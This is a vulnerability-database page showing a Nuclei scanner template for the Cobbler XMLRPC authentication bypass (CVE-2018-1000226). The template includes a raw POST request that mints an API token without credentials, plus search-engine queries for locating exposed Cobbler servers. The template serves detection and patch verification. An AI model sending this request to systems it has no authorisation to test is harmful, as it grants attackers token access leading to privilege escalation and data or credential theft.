Lucene search
K

Cobbler - Authentication Bypass

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 96 Views

Cobbler XMLRPC API Authentication Bypass Vulnerabilit

Related
Refs
Code
id: CVE-2018-1000226

info:
  name: Cobbler - Authentication Bypass
  author: c-sh0
  severity: critical
  description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
  impact: |
    Unauthenticated attackers can bypass authentication to gain unauthorized access, leading to privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
  reference:
    - https://github.com/cobbler/cobbler/issues/1916
    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000226
    cwe-id: CWE-732
    epss-score: 0.12484
    epss-percentile: 0.95733
    cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cobblerd
    product: cobbler
    shodan-query: http.title:"cobbler web interface"
    fofa-query: title="cobbler web interface"
    google-query: intitle:"cobbler web interface"
  tags: cve2018,cve,cobbler,auth-bypass,cobblerd,vuln

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
          <params>
            <param>
              <value>
                <string>cobbler</string>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(body), '<name>faultCode</name>')"

      - type: word
        part: header
        words:
          - "Content-Type: text/xml"

      - type: word
        part: body
        words:
          - "<methodResponse>"

      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"

      - type: status
        status:
          - 200
# digest: 490a00463044022007c5b98b87e8010e1221282cb56b2a79f07a58649d231ad8e003ed128a3c1165022072c5cee373b5e410a46bd0102da3abcf113ce05d66796a8a85af921b0150e84c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
CVSS 39.8
EPSS0.12484
96